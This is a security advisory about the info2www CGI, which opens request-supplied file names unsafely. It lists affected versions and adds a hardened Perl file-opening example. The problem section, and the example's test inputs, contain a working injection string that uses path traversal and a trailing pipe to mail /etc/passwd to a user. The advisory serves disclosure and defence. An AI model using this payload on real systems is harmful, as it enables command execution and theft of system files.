COMMAND

    info2www

SYSTEMS AFFECTED

    Systems having info2www 1.1 (and some other versions)

PROBLEM

    Niall Smart found the following.  Some versions of the info2www
    CGI blindly open files named in the request:

    $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail user_name </etc/passwd|)'
    $
    You have new mail.
    $

    Tracking down which versions of info2www have this bug and which
    don't has been difficult.  There are lots of variants out there,
    some of which aren't vulnerable.  Instead of trying to make a list
    of vulnerable versions, let's say the following:

        - if it has no version number, it's probably vulnerable
        - the uuencoded version at CPAN is corrupt, and the one which
          the README file tells you to get is vulnerable
        - version 1.1 is vulnerable
        - version 1.2.x seems OK (seems!)

    Apparently info2www is based on info2html and infogate, so these
    may have problems too.

SOLUTION

    1.2.x seems to be OK, but that is not confirmed yet.
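
    The hardening pattern below is an added example, not code from
    info2www or from this advisory.  It assumes the flaw is a Perl
    two-argument open() on the request-supplied file name; $INFO_DIR
    and open_info_file are hypothetical names.

```perl
#!/usr/bin/perl
# Added example (not info2www source): open a request-supplied info file safely.
use strict;
use warnings;

my $INFO_DIR = '/usr/local/info';    # assumed location of the info tree

# Assumed vulnerable pattern: open(FILE, $name) with $name taken from the
# request. In two-argument open a trailing "|" means "run this string as a
# command and read its output", and "../" walks out of the info directory.

# Hardened pattern: allow-list the name, then use three-argument open so the
# mode is fixed to "read a file" whatever characters the name contains.
sub open_info_file {
    my ($name) = @_;
    return unless defined $name;

    # Plain file names only: no "/", no pipe or shell characters,
    # no leading dot or dash, bounded length.
    return unless $name =~ /\A([A-Za-z0-9_][A-Za-z0-9_.+-]{0,63})\z/;
    my $safe = $1;                   # captured value is untainted under -T

    my $path = "$INFO_DIR/$safe";
    return unless -f $path;          # regular files only
    open(my $fh, '<', $path) or return;
    return $fh;
}

# Constructed inputs: two ordinary info file names, the request string shown
# in this advisory, and a name with a trailing pipe.
my @requests = (
    'emacs',
    'gcc.info-1',
    '(../../../../../../../bin/mail user_name </etc/passwd|)',
    'dir|',
);

for my $req (@requests) {
    my $fh = open_info_file($req);
    printf "%-60s %s\n", "'$req'", $fh ? 'opened' : 'rejected';
    close $fh if $fh;
}
```

    The last two inputs are rejected by the allow-list before any
    open() call; the first two are opened only if they exist as
    regular files under $INFO_DIR.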